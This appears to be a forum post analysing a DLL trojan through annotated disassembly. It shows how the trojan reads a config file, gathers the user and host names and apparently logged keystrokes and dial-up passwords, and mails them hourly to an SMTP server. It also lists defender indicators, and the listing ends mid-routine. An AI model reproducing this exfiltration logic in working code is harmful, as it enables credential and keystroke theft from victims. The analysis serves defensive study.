发一个 DLL 木马的分析
; CheckWeb.100013E0 -- starts the worker thread (32-bit x86, OllyDbg listing).
; Builds a 12-byte SECURITY_ATTRIBUTES on the stack and calls
; CreateThread(&sa, 0, CheckWeb.10001420, NULL, 0, &threadId).
; The handle returned in EAX is neither stored nor closed in this routine.
100013E0 /$ 83EC 10 SUB ESP,10
100013E3 |. 8D4424 00 LEA EAX,DWORD PTR SS:[ESP]
100013E7 |. 8D4C24 04 LEA ECX,DWORD PTR SS:[ESP+4]
100013EB |. 50 PUSH EAX ; /pThreadId
100013EC |. 6A 00 PUSH 0 ; |CreationFlags = 0
100013EE |. 6A 00 PUSH 0 ; |pThreadParm = NULL
100013F0 |. 68 20140010 PUSH CheckWeb.10001420 ; |ThreadFunction = CheckWeb.10001420
100013F5 |. 6A 00 PUSH 0 ; |StackSize = 0
100013F7 |. 51 PUSH ECX ; |pSecurity
; Six DWORDs are on the stack now, so [ESP+1C] is the structure whose address ECX took at [ESP+4].
100013F8 |. C74424 24 010>MOV DWORD PTR SS:[ESP+24],1 ; | sa.bInheritHandle = TRUE
10001400 |. C74424 20 000>MOV DWORD PTR SS:[ESP+20],0 ; | sa.lpSecurityDescriptor = NULL
10001408 |. C74424 1C 0C0>MOV DWORD PTR SS:[ESP+1C],0C ; | sa.nLength = 12
10001410 |. FF15 30800010 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread
10001416 |. 83C4 10 ADD ESP,10
10001419 \. C3 RETN
开一个线程,回调函数10001420
; CheckWeb.10001420 -- thread routine handed to CreateThread by 100013E0.
; 1. Zeroes five 50-byte global buffers (12 DWORDs + 1 WORD each), laid out 0x34 bytes apart.
; 2. Calls 10001F70, which opens <system directory>\driver32.dll for reading.
; 3. Calls 10002330 once per buffer, passing the same buffer as both arguments.
; 4. Sleeps 2 minutes, then loops forever: call 100014E0, sleep 1 hour.
; The routine never returns, so the ESI/EDI pushed here are never popped.
10001420 . 56 PUSH ESI
10001421 . 57 PUSH EDI
10001422 . B9 0C000000 MOV ECX,0C
10001427 . 33C0 XOR EAX,EAX
10001429 . BF D0710110 MOV EDI,CheckWeb.100171D0
1000142E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001430 . 66:AB STOS WORD PTR ES:[EDI]
10001432 . B9 0C000000 MOV ECX,0C
10001437 . 33C0 XOR EAX,EAX
10001439 . BF 04720110 MOV EDI,CheckWeb.10017204
1000143E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001440 . 66:AB STOS WORD PTR ES:[EDI]
10001442 . B9 0C000000 MOV ECX,0C
10001447 . 33C0 XOR EAX,EAX
10001449 . BF 38720110 MOV EDI,CheckWeb.10017238
1000144E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001450 . 66:AB STOS WORD PTR ES:[EDI]
10001452 . B9 0C000000 MOV ECX,0C
10001457 . 33C0 XOR EAX,EAX
10001459 . BF 6C720110 MOV EDI,CheckWeb.1001726C
1000145E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001460 . 66:AB STOS WORD PTR ES:[EDI]
10001462 . B9 0C000000 MOV ECX,0C
10001467 . 33C0 XOR EAX,EAX
10001469 . BF A0720110 MOV EDI,CheckWeb.100172A0
1000146E . F3:AB REP STOS DWORD PTR ES:[EDI]
10001470 . 66:AB STOS WORD PTR ES:[EDI] ; all five buffers are zeroed at this point
; NOTE(review): 10001F70 presumably fills the five buffers from the file it opens; only its
; failure path is listed on this page, so this is unconfirmed.
10001472 . E8 F90A0000 CALL CheckWeb.10001F70
; 10002330(buf, buf) on each buffer; its body is not shown. Source and destination are the
; same buffer, so it possibly transforms the text in place -- TODO confirm.
10001477 . 68 D0710110 PUSH CheckWeb.100171D0
1000147C . 68 D0710110 PUSH CheckWeb.100171D0
10001481 . E8 AA0E0000 CALL CheckWeb.10002330
10001486 . 68 04720110 PUSH CheckWeb.10017204
1000148B . 68 04720110 PUSH CheckWeb.10017204
10001490 . E8 9B0E0000 CALL CheckWeb.10002330
10001495 . 68 38720110 PUSH CheckWeb.10017238
1000149A . 68 38720110 PUSH CheckWeb.10017238
1000149F . E8 8C0E0000 CALL CheckWeb.10002330
100014A4 . 68 6C720110 PUSH CheckWeb.1001726C
100014A9 . 68 6C720110 PUSH CheckWeb.1001726C
100014AE . E8 7D0E0000 CALL CheckWeb.10002330
100014B3 . 68 A0720110 PUSH CheckWeb.100172A0
100014B8 . 68 A0720110 PUSH CheckWeb.100172A0
100014BD . E8 6E0E0000 CALL CheckWeb.10002330
100014C2 . 8B35 2C800010 MOV ESI,DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep
100014C8 . 83C4 28 ADD ESP,28 ; drops the ten DWORD arguments pushed for the five calls above
100014CB . 68 C0D40100 PUSH 1D4C0 ; first delay: 0x1D4C0 ms = 120 s
100014D0 > FFD6 CALL ESI ; Sleep(2 minutes) on the first pass, Sleep(1 hour) on every later pass
100014D2 . E8 09000000 CALL CheckWeb.100014E0 ; the SMTP sending routine
100014D7 . 68 80EE3600 PUSH 36EE80 ; later delays: 0x36EE80 ms = 3600 s
100014DC .^ EB F2 JMP SHORT CheckWeb.100014D0
函数10001F70的内容
; CheckWeb.10001F70 -- opens <system directory>\driver32.dll for reading.
; Frame 0x304 bytes: a 512-byte buffer at the bottom, a 260-byte path buffer at +0x200.
; Only the path up to the failure return is listed; the success path at 10001FCE is not
; shown. On failure the routine returns AL = 0.
; NOTE(review): the file is opened through fopen in "r" mode, so it is presumably a data
; file carrying a .dll name rather than a loadable module -- confirm against the sample.
10001F70 /$ 81EC 04030000 SUB ESP,304
10001F76 |. 8D8424 000200>LEA EAX,DWORD PTR SS:[ESP+200]
10001F7D |. 53 PUSH EBX
10001F7E |. 56 PUSH ESI
10001F7F |. 57 PUSH EDI
10001F80 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
10001F85 |. 50 PUSH EAX ; |Buffer
10001F86 |. FF15 20800010 CALL DWORD PTR DS:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
10001F8C |. 8D8C24 0C0200>LEA ECX,DWORD PTR SS:[ESP+20C] ; same path buffer (three registers pushed since the first LEA); it now holds the system directory
10001F93 |. 68 3C910010 PUSH CheckWeb.1000913C ; /StringToAdd = "\driver32.dll"
10001F98 |. 51 PUSH ECX ; |ConcatString
10001F99 |. FF15 24800010 CALL DWORD PTR DS:[<&KERNEL32.lstrcatA>] ; \lstrcatA
; lstrcatA returns the destination pointer, so EDX ends up pointing at the full path.
10001F9F |. 8BD0 MOV EDX,EAX edx = C:\WINDOWS\system32\driver32.dll
10001FA1 |. B9 80000000 MOV ECX,80
10001FA6 |. 33C0 XOR EAX,EAX
10001FA8 |. 8D7C24 0C LEA EDI,DWORD PTR SS:[ESP+C] ; start of the 512-byte local buffer, taken before the pushes below
10001FAC |. 68 38910010 PUSH CheckWeb.10009138 ; fopen mode string, shown by the debugger as "r"
10001FB1 |. 52 PUSH EDX ; Filename
10001FB2 |. F3:AB REP STOS DWORD PTR ES:[EDI] ; zero 0x80 DWORDs = 512 bytes
10001FB4 |. E8 360B0000 CALL CheckWeb.10002AEF ; _fopen
10001FB9 |. 8BD8 MOV EBX,EAX
10001FBB |. 83C4 08 ADD ESP,8 ; cdecl cleanup of the two fopen arguments
10001FBE |. 85DB TEST EBX,EBX ; EBX = FILE*; non-NULL means the open succeeded
10001FC0 |. 75 0C JNZ SHORT CheckWeb.10001FCE
; Open failed: restore registers and return AL = 0.
10001FC2 |> 5F POP EDI
10001FC3 |. 5E POP ESI
10001FC4 |. 32C0 XOR AL,AL
10001FC6 |. 5B POP EBX
10001FC7 |. 81C4 04030000 ADD ESP,304
10001FCD |. C3 RETN
CheckWeb.100014E0
; Call site repeated from the thread routine at 10001420: call 100014E0, then push the
; 1-hour Sleep argument (0x36EE80 ms) and jump back to the Sleep call at 100014D0.
100014D2 . E8 09000000 CALL CheckWeb.100014E0
100014D7 . 68 80EE3600 PUSH 36EE80
100014DC .^ EB F2 JMP SHORT CheckWeb.100014D0
; Two NOPs fill the gap up to 100014E0, where the next routine starts.
100014DE 90 NOP
100014DF 90 NOP
; CheckWeb.100014E0 -- sends the collected data out as an e-mail over SMTP.
; Called from the loop at 100014D2. Frame: 0x75C bytes; EBX = socket, ESI = "server name is
; a dotted IP" flag. The routine returns 0 on every path.
; Stack buffers, as offsets from ESP once EDI has been pushed at 1000154B:
;   +0C  size DWORD (0x40)        +10  sockaddr_in
;   +20  gethostname buffer       +64  GetUserNameA buffer
;   +A8, +10C, +170  100-byte format buffers
;   +1D4 1024-byte recv buffer
; Globals, by how this routine uses them:
;   100171D0 = server name; 1001726C and 10017238 = the two answers sent after "334";
;   100172A0 = sender address; 10017204 = recipient address;
;   1000AE18, 1000AE80, 10009E18 = body text, presumably filled by 10001D00, 100021B0 and
;   10001000 (those routines are not shown on this page).
; NOTE(review): the helpers are not shown either. From their arguments 100025F0 looks like
; strstr, 10002598 like sprintf, 1000273C like isdigit and 10002680 like strchr -- unconfirmed.
; The short command strings (10009118, 10009104, ...) are not listed; the SMTP verbs named
; below are inferred from their lengths and from the reply code checked afterwards.
; Defender's view of this routine: outbound TCP port 25 from the process hosting the DLL,
; a Subject equal to the machine's host name, and the fallback body markers
; "not key log!!!" and "not x dial pass!!!".
100014E0 /$ 81EC 5C070000 SUB ESP,75C
100014E6 |. 53 PUSH EBX
100014E7 |. 8D8424 D00500>LEA EAX,DWORD PTR SS:[ESP+5D0]
100014EE |. 56 PUSH ESI
100014EF |. 50 PUSH EAX ; /pWSAData
100014F0 |. 68 01010000 PUSH 101 ; |RequestedVersion = 101 (1.1.)
; [ESP+10] here is the size DWORD later passed to GetUserNameA as pBufCount.
100014F5 |. C74424 10 400>MOV DWORD PTR SS:[ESP+10],40 ; |
100014FD |. 33F6 XOR ESI,ESI ; |
100014FF |. C605 18AE0010>MOV BYTE PTR DS:[1000AE18],0 ; |
10001506 |. E8 B90E0000 CALL <JMP.&WSOCK32.#115> ; \WSAStartup
1000150B |. 85C0 TEST EAX,EAX
1000150D |. 74 0B JE SHORT CheckWeb.1000151A
; WSAStartup failed: return 0.
1000150F |. 5E POP ESI
10001510 |. 33C0 XOR EAX,EAX
10001512 |. 5B POP EBX
10001513 |. 81C4 5C070000 ADD ESP,75C
10001519 |. C3 RETN
; 10001D00(1000AE18): not shown; the buffer is sent later as part of the message body.
1000151A |> 68 18AE0010 PUSH CheckWeb.1000AE18
1000151F |. E8 DC070000 CALL CheckWeb.10001D00
10001524 |. 83C4 04 ADD ESP,4
10001527 |. 6A 00 PUSH 0 ; /Protocol = IPPROTO_IP
10001529 |. 6A 01 PUSH 1 ; |Type = SOCK_STREAM
1000152B |. 6A 02 PUSH 2 ; |Family = AF_INET
1000152D |. E8 8C0E0000 CALL <JMP.&WSOCK32.#23> ; \socket
10001532 |. 8BD8 MOV EBX,EAX
10001534 |. 83FB FF CMP EBX,-1
10001537 |. 75 0B JNZ SHORT CheckWeb.10001544
; socket() returned INVALID_SOCKET: return 0 (WSACleanup is not called on this path).
10001539 |. 5E POP ESI
1000153A |. 33C0 XOR EAX,EAX
1000153C |. 5B POP EBX
1000153D |. 81C4 5C070000 ADD ESP,75C
10001543 |. C3 RETN
; Decide how to resolve the server name in 100171D0: if 1000273C accepts its first
; character and 10002680 finds 0x2E ('.') in it, set ESI = 1 (use inet_addr later);
; otherwise call gethostbyname.
10001544 |> 0FBE0D D07101>MOVSX ECX,BYTE PTR DS:[100171D0]
1000154B |. 57 PUSH EDI
1000154C |. 51 PUSH ECX
1000154D |. E8 EA110000 CALL CheckWeb.1000273C
10001552 |. 83C4 04 ADD ESP,4
10001555 |. 85C0 TEST EAX,EAX
10001557 |. 74 1E JE SHORT CheckWeb.10001577
10001559 |. 6A 2E PUSH 2E
1000155B |. 68 D0710110 PUSH CheckWeb.100171D0
10001560 |. E8 1B110000 CALL CheckWeb.10002680
10001565 |. 83C4 08 ADD ESP,8
10001568 |. 85C0 TEST EAX,EAX
1000156A |. 74 0B JE SHORT CheckWeb.10001577
; EDI takes the size DWORD (0x40): a non-zero value so the TEST EDI,EDI below passes.
1000156C |. 8B7C24 0C MOV EDI,DWORD PTR SS:[ESP+C]
10001570 |. BE 01000000 MOV ESI,1
10001575 |. EB 0C JMP SHORT CheckWeb.10001583
; Name = "" is what the debugger saw in the buffer in this dump, not a constant.
10001577 |> 68 D0710110 PUSH CheckWeb.100171D0 ; /Name = ""
1000157C |. E8 370E0000 CALL <JMP.&WSOCK32.#52> ; \gethostbyname
10001581 |. 8BF8 MOV EDI,EAX
10001583 |> 85FF TEST EDI,EDI
10001585 |. 0F84 58070000 JE CheckWeb.10001CE3
; Fill the sockaddr_in: family AF_INET (2), port 0x19 = 25 (ntohs does the same byte swap
; as htons), address from inet_addr or from the first entry of the hostent address list.
1000158B |. 6A 19 PUSH 19 ; /NetShort = 19
1000158D |. 66:C74424 14 >MOV WORD PTR SS:[ESP+14],2 ; |
10001594 |. E8 190E0000 CALL <JMP.&WSOCK32.#9> ; \ntohs
10001599 |. 85F6 TEST ESI,ESI
1000159B |. 66:894424 12 MOV WORD PTR SS:[ESP+12],AX
100015A0 |. 74 10 JE SHORT CheckWeb.100015B2
100015A2 |. 68 D0710110 PUSH CheckWeb.100171D0 ; /pAddr = CheckWeb.100171D0
100015A7 |. E8 000E0000 CALL <JMP.&WSOCK32.#10> ; \inet_addr
100015AC |. 894424 14 MOV DWORD PTR SS:[ESP+14],EAX
100015B0 |. EB 0B JMP SHORT CheckWeb.100015BD
100015B2 |> 8B57 0C MOV EDX,DWORD PTR DS:[EDI+C]
100015B5 |. 8B02 MOV EAX,DWORD PTR DS:[EDX]
100015B7 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
100015B9 |. 894C24 14 MOV DWORD PTR SS:[ESP+14],ECX
; Collect the logged-on user name (+64) and the local host name (+20), 0x40 bytes each.
100015BD |> 8D5424 0C LEA EDX,DWORD PTR SS:[ESP+C]
100015C1 |. 8D4424 64 LEA EAX,DWORD PTR SS:[ESP+64]
100015C5 |. 52 PUSH EDX ; /pBufCount
100015C6 |. 50 PUSH EAX ; |Buffer
100015C7 |. FF15 04800010 CALL DWORD PTR DS:[<&ADVAPI32.GetUserNam>; \GetUserNameA
100015CD |. 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20]
100015D1 |. 6A 40 PUSH 40 ; /BufSize = 40 (64.)
100015D3 |. 51 PUSH ECX ; |Buffer
100015D4 |. C74424 14 400>MOV DWORD PTR SS:[ESP+14],40 ; |
100015DC |. E8 C50D0000 CALL <JMP.&WSOCK32.#57> ; \gethostname
100015E1 |. 8D5424 10 LEA EDX,DWORD PTR SS:[ESP+10]
100015E5 |. 6A 10 PUSH 10 ; /AddrLen = 10 (16.)
100015E7 |. 52 PUSH EDX ; |pSockAddr
100015E8 |. 53 PUSH EBX ; |Socket
100015E9 |. E8 B20D0000 CALL <JMP.&WSOCK32.#4> ; \connect
100015EE |. 85C0 TEST EAX,EAX
100015F0 |. 0F85 ED060000 JNZ CheckWeb.10001CE3
; Read the server greeting and require "220" in it. EAX is 0 here and serves as Flags.
100015F6 |. 50 PUSH EAX ; /Flags
100015F7 |. 8D8424 D80100>LEA EAX,DWORD PTR SS:[ESP+1D8] ; |
100015FE |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
10001603 |. 50 PUSH EAX ; |Buffer
10001604 |. 53 PUSH EBX ; |Socket
10001605 |. E8 900D0000 CALL <JMP.&WSOCK32.#16> ; \recv
1000160A |. 85C0 TEST EAX,EAX
1000160C |. 0F8E D1060000 JLE CheckWeb.10001CE3
10001612 |. 8D8C24 D40100>LEA ECX,DWORD PTR SS:[ESP+1D4]
10001619 |. 68 20910010 PUSH CheckWeb.10009120 ; ASCII "220"
1000161E |. 51 PUSH ECX
1000161F |. E8 CC0F0000 CALL CheckWeb.100025F0
10001624 |. 83C4 08 ADD ESP,8
10001627 |. 85C0 TEST EAX,EAX
10001629 |. 0F84 B4060000 JE CheckWeb.10001CE3
; Send the 5-byte string at 10009118 (presumably "HELO "), the local host name, then the
; 2-byte string at 10009114 (presumably CRLF; it closes every command line below).
1000162F |. 6A 00 PUSH 0 ; /Flags = 0
10001631 |. 6A 05 PUSH 5 ; |DataSize = 5
10001633 |. 68 18910010 PUSH CheckWeb.10009118 ; |Data = CheckWeb.10009118
10001638 |. 53 PUSH EBX ; |Socket
10001639 |. E8 560D0000 CALL <JMP.&WSOCK32.#19> ; \send
1000163E |. 85C0 TEST EAX,EAX
10001640 |. 0F8E 9D060000 JLE CheckWeb.10001CE3
; Inline strlen, used throughout: ECX = -1, REPNE SCAS for the NUL, NOT ECX, DEC ECX.
10001646 |. 8D7C24 20 LEA EDI,DWORD PTR SS:[ESP+20]
1000164A |. 83C9 FF OR ECX,FFFFFFFF
1000164D |. 33C0 XOR EAX,EAX
1000164F |. 6A 00 PUSH 0 ; /Flags = 0
10001651 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001653 |. F7D1 NOT ECX ; |
10001655 |. 49 DEC ECX ; |
10001656 |. 8D5424 24 LEA EDX,DWORD PTR SS:[ESP+24] ; |
1000165A |. 51 PUSH ECX ; |DataSize
1000165B |. 52 PUSH EDX ; |Data
1000165C |. 53 PUSH EBX ; |Socket
1000165D |. E8 320D0000 CALL <JMP.&WSOCK32.#19> ; \send
10001662 |. 85C0 TEST EAX,EAX
10001664 |. 0F8E 79060000 JLE CheckWeb.10001CE3
1000166A |. 6A 00 PUSH 0 ; /Flags = 0
1000166C |. 6A 02 PUSH 2 ; |DataSize = 2
1000166E |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001673 |. 53 PUSH EBX ; |Socket
10001674 |. E8 1B0D0000 CALL <JMP.&WSOCK32.#19> ; \send
10001679 |. 85C0 TEST EAX,EAX
1000167B |. 0F8E 62060000 JLE CheckWeb.10001CE3
10001681 |. 6A 00 PUSH 0 ; /Flags = 0
10001683 |. 8D8424 D80100>LEA EAX,DWORD PTR SS:[ESP+1D8] ; |
1000168A |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
1000168F |. 50 PUSH EAX ; |Buffer
10001690 |. 53 PUSH EBX ; |Socket
10001691 |. E8 040D0000 CALL <JMP.&WSOCK32.#16> ; \recv
10001696 |. 85C0 TEST EAX,EAX
10001698 |. 0F8E 45060000 JLE CheckWeb.10001CE3
1000169E |. 8D8C24 D40100>LEA ECX,DWORD PTR SS:[ESP+1D4]
100016A5 |. 68 10910010 PUSH CheckWeb.10009110 ; ASCII "250"
100016AA |. 51 PUSH ECX
100016AB |. E8 400F0000 CALL CheckWeb.100025F0
100016B0 |. 83C4 08 ADD ESP,8
100016B3 |. 85C0 TEST EAX,EAX
100016B5 |. 0F84 28060000 JE CheckWeb.10001CE3
; Send the 10-byte string at 10009104 (presumably "AUTH LOGIN") and CRLF. If the reply does
; not contain "334", authentication is skipped and control goes to 1000180F.
100016BB |. 6A 00 PUSH 0 ; /Flags = 0
100016BD |. 6A 0A PUSH 0A ; |DataSize = A (10.)
100016BF |. 68 04910010 PUSH CheckWeb.10009104 ; |Data = CheckWeb.10009104
100016C4 |. 53 PUSH EBX ; |Socket
100016C5 |. E8 CA0C0000 CALL <JMP.&WSOCK32.#19> ; \send
100016CA |. 85C0 TEST EAX,EAX
100016CC |. 0F8E 11060000 JLE CheckWeb.10001CE3
100016D2 |. 6A 00 PUSH 0 ; /Flags = 0
100016D4 |. 6A 02 PUSH 2 ; |DataSize = 2
100016D6 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
100016DB |. 53 PUSH EBX ; |Socket
100016DC |. E8 B30C0000 CALL <JMP.&WSOCK32.#19> ; \send
100016E1 |. 85C0 TEST EAX,EAX
100016E3 |. 0F8E FA050000 JLE CheckWeb.10001CE3
100016E9 |. 6A 00 PUSH 0 ; /Flags = 0
100016EB |. 8D9424 D80100>LEA EDX,DWORD PTR SS:[ESP+1D8] ; |
100016F2 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
100016F7 |. 52 PUSH EDX ; |Buffer
100016F8 |. 53 PUSH EBX ; |Socket
100016F9 |. E8 9C0C0000 CALL <JMP.&WSOCK32.#16> ; \recv
100016FE |. 85C0 TEST EAX,EAX
10001700 |. 0F8E DD050000 JLE CheckWeb.10001CE3
10001706 |. 8D8424 D40100>LEA EAX,DWORD PTR SS:[ESP+1D4]
1000170D |. 68 00910010 PUSH CheckWeb.10009100 ; ASCII "334"
10001712 |. 50 PUSH EAX
10001713 |. E8 D80E0000 CALL CheckWeb.100025F0
10001718 |. 83C4 08 ADD ESP,8
1000171B |. 85C0 TEST EAX,EAX
1000171D |. 0F84 EC000000 JE CheckWeb.1000180F
; First answer: the text in 1001726C plus CRLF; the next reply must contain "334" again.
10001723 |. BF 6C720110 MOV EDI,CheckWeb.1001726C
10001728 |. 83C9 FF OR ECX,FFFFFFFF
1000172B |. 33C0 XOR EAX,EAX
1000172D |. 6A 00 PUSH 0 ; /Flags = 0
1000172F |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001731 |. F7D1 NOT ECX ; |
10001733 |. 49 DEC ECX ; |
10001734 |. 51 PUSH ECX ; |DataSize
10001735 |. 68 6C720110 PUSH CheckWeb.1001726C ; |Data = CheckWeb.1001726C
1000173A |. 53 PUSH EBX ; |Socket
1000173B |. E8 540C0000 CALL <JMP.&WSOCK32.#19> ; \send
10001740 |. 85C0 TEST EAX,EAX
10001742 |. 0F8E 9B050000 JLE CheckWeb.10001CE3
10001748 |. 6A 00 PUSH 0 ; /Flags = 0
1000174A |. 6A 02 PUSH 2 ; |DataSize = 2
1000174C |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001751 |. 53 PUSH EBX ; |Socket
10001752 |. E8 3D0C0000 CALL <JMP.&WSOCK32.#19> ; \send
10001757 |. 85C0 TEST EAX,EAX
10001759 |. 0F8E 84050000 JLE CheckWeb.10001CE3
1000175F |. 6A 00 PUSH 0 ; /Flags = 0
10001761 |. 8D8C24 D80100>LEA ECX,DWORD PTR SS:[ESP+1D8] ; |
10001768 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
1000176D |. 51 PUSH ECX ; |Buffer
1000176E |. 53 PUSH EBX ; |Socket
1000176F |. E8 260C0000 CALL <JMP.&WSOCK32.#16> ; \recv
10001774 |. 85C0 TEST EAX,EAX
10001776 |. 0F8E 67050000 JLE CheckWeb.10001CE3
1000177C |. 8D9424 D40100>LEA EDX,DWORD PTR SS:[ESP+1D4]
10001783 |. 68 00910010 PUSH CheckWeb.10009100 ; ASCII "334"
10001788 |. 52 PUSH EDX
10001789 |. E8 620E0000 CALL CheckWeb.100025F0
1000178E |. 83C4 08 ADD ESP,8
10001791 |. 85C0 TEST EAX,EAX
10001793 |. 0F84 4A050000 JE CheckWeb.10001CE3
; Second answer: the text in 10017238 plus CRLF; the reply must contain "235".
10001799 |. BF 38720110 MOV EDI,CheckWeb.10017238
1000179E |. 83C9 FF OR ECX,FFFFFFFF
100017A1 |. 33C0 XOR EAX,EAX
100017A3 |. 6A 00 PUSH 0 ; /Flags = 0
100017A5 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
100017A7 |. F7D1 NOT ECX ; |
100017A9 |. 49 DEC ECX ; |
100017AA |. 51 PUSH ECX ; |DataSize
100017AB |. 68 38720110 PUSH CheckWeb.10017238 ; |Data = CheckWeb.10017238
100017B0 |. 53 PUSH EBX ; |Socket
100017B1 |. E8 DE0B0000 CALL <JMP.&WSOCK32.#19> ; \send
100017B6 |. 85C0 TEST EAX,EAX
100017B8 |. 0F8E 25050000 JLE CheckWeb.10001CE3
100017BE |. 6A 00 PUSH 0 ; /Flags = 0
100017C0 |. 6A 02 PUSH 2 ; |DataSize = 2
100017C2 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
100017C7 |. 53 PUSH EBX ; |Socket
100017C8 |. E8 C70B0000 CALL <JMP.&WSOCK32.#19> ; \send
100017CD |. 85C0 TEST EAX,EAX
100017CF |. 0F8E 0E050000 JLE CheckWeb.10001CE3
100017D5 |. 6A 00 PUSH 0 ; /Flags = 0
100017D7 |. 8D8424 D80100>LEA EAX,DWORD PTR SS:[ESP+1D8] ; |
100017DE |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
100017E3 |. 50 PUSH EAX ; |Buffer
100017E4 |. 53 PUSH EBX ; |Socket
100017E5 |. E8 B00B0000 CALL <JMP.&WSOCK32.#16> ; \recv
100017EA |. 85C0 TEST EAX,EAX
100017EC |. 0F8E F1040000 JLE CheckWeb.10001CE3
100017F2 |. 8D8C24 D40100>LEA ECX,DWORD PTR SS:[ESP+1D4]
100017F9 |. 68 FC900010 PUSH CheckWeb.100090FC ; ASCII "235"
100017FE |. 51 PUSH ECX
100017FF |. E8 EC0D0000 CALL CheckWeb.100025F0
10001804 |. 83C4 08 ADD ESP,8
10001807 |. 85C0 TEST EAX,EAX
10001809 |. 0F84 D4040000 JE CheckWeb.10001CE3
; Send the 10-byte string at 100090F0 (presumably "MAIL FROM:"), then " <%s>" formatted
; with the sender address in 100172A0, then CRLF; the reply must contain "250".
1000180F |> 6A 00 PUSH 0 ; /Flags = 0
10001811 |. 6A 0A PUSH 0A ; |DataSize = A (10.)
10001813 |. 68 F0900010 PUSH CheckWeb.100090F0 ; |Data = CheckWeb.100090F0
10001818 |. 53 PUSH EBX ; |Socket
10001819 |. E8 760B0000 CALL <JMP.&WSOCK32.#19> ; \send
1000181E |. 85C0 TEST EAX,EAX
10001820 |. 0F8E BD040000 JLE CheckWeb.10001CE3
; 0x19 DWORDs = 100 bytes of format buffer are zeroed before the formatting call.
10001826 |. B9 19000000 MOV ECX,19
1000182B |. 33C0 XOR EAX,EAX
1000182D |. 8DBC24 A80000>LEA EDI,DWORD PTR SS:[ESP+A8]
10001834 |. 68 A0720110 PUSH CheckWeb.100172A0
10001839 |. 8D9424 AC0000>LEA EDX,DWORD PTR SS:[ESP+AC]
10001840 |. 68 E8900010 PUSH CheckWeb.100090E8 ; ASCII " <%s>"
10001845 |. F3:AB REP STOS DWORD PTR ES:[EDI]
10001847 |. 52 PUSH EDX
10001848 |. E8 4B0D0000 CALL CheckWeb.10002598
1000184D |. 8DBC24 B40000>LEA EDI,DWORD PTR SS:[ESP+B4]
10001854 |. 83C9 FF OR ECX,FFFFFFFF
10001857 |. 33C0 XOR EAX,EAX
10001859 |. 83C4 0C ADD ESP,0C
1000185C |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
1000185E |. F7D1 NOT ECX
10001860 |. 49 DEC ECX
10001861 |. 6A 00 PUSH 0 ; /Flags = 0
10001863 |. 8D8424 AC0000>LEA EAX,DWORD PTR SS:[ESP+AC] ; |
1000186A |. 51 PUSH ECX ; |DataSize
1000186B |. 50 PUSH EAX ; |Data
1000186C |. 53 PUSH EBX ; |Socket
1000186D |. E8 220B0000 CALL <JMP.&WSOCK32.#19> ; \send
10001872 |. 85C0 TEST EAX,EAX
10001874 |. 0F8E 69040000 JLE CheckWeb.10001CE3
1000187A |. 6A 00 PUSH 0 ; /Flags = 0
1000187C |. 6A 02 PUSH 2 ; |DataSize = 2
1000187E |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001883 |. 53 PUSH EBX ; |Socket
10001884 |. E8 0B0B0000 CALL <JMP.&WSOCK32.#19> ; \send
10001889 |. 85C0 TEST EAX,EAX
1000188B |. 0F8E 52040000 JLE CheckWeb.10001CE3
10001891 |. 6A 00 PUSH 0 ; /Flags = 0
10001893 |. 8D8C24 D80100>LEA ECX,DWORD PTR SS:[ESP+1D8] ; |
1000189A |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
1000189F |. 51 PUSH ECX ; |Buffer
100018A0 |. 53 PUSH EBX ; |Socket
100018A1 |. E8 F40A0000 CALL <JMP.&WSOCK32.#16> ; \recv
100018A6 |. 85C0 TEST EAX,EAX
100018A8 |. 0F8E 35040000 JLE CheckWeb.10001CE3
100018AE |. 8D9424 D40100>LEA EDX,DWORD PTR SS:[ESP+1D4]
100018B5 |. 68 10910010 PUSH CheckWeb.10009110 ; ASCII "250"
100018BA |. 52 PUSH EDX
100018BB |. E8 300D0000 CALL CheckWeb.100025F0
100018C0 |. 83C4 08 ADD ESP,8
100018C3 |. 85C0 TEST EAX,EAX
100018C5 |. 0F84 18040000 JE CheckWeb.10001CE3
; Send the 8-byte string at 100090DC (presumably "RCPT TO:"), then " <%s>" formatted with
; the recipient address in 10017204, then CRLF; the reply must contain "250".
100018CB |. 6A 00 PUSH 0 ; /Flags = 0
100018CD |. 6A 08 PUSH 8 ; |DataSize = 8
100018CF |. 68 DC900010 PUSH CheckWeb.100090DC ; |Data = CheckWeb.100090DC
100018D4 |. 53 PUSH EBX ; |Socket
100018D5 |. E8 BA0A0000 CALL <JMP.&WSOCK32.#19> ; \send
100018DA |. 85C0 TEST EAX,EAX
100018DC |. 0F8E 01040000 JLE CheckWeb.10001CE3
100018E2 |. B9 19000000 MOV ECX,19
100018E7 |. 33C0 XOR EAX,EAX
100018E9 |. 8DBC24 700100>LEA EDI,DWORD PTR SS:[ESP+170]
100018F0 |. 68 04720110 PUSH CheckWeb.10017204
100018F5 |. F3:AB REP STOS DWORD PTR ES:[EDI]
100018F7 |. 8D8424 740100>LEA EAX,DWORD PTR SS:[ESP+174]
100018FE |. 68 E8900010 PUSH CheckWeb.100090E8 ; ASCII " <%s>"
10001903 |. 50 PUSH EAX
10001904 |. E8 8F0C0000 CALL CheckWeb.10002598
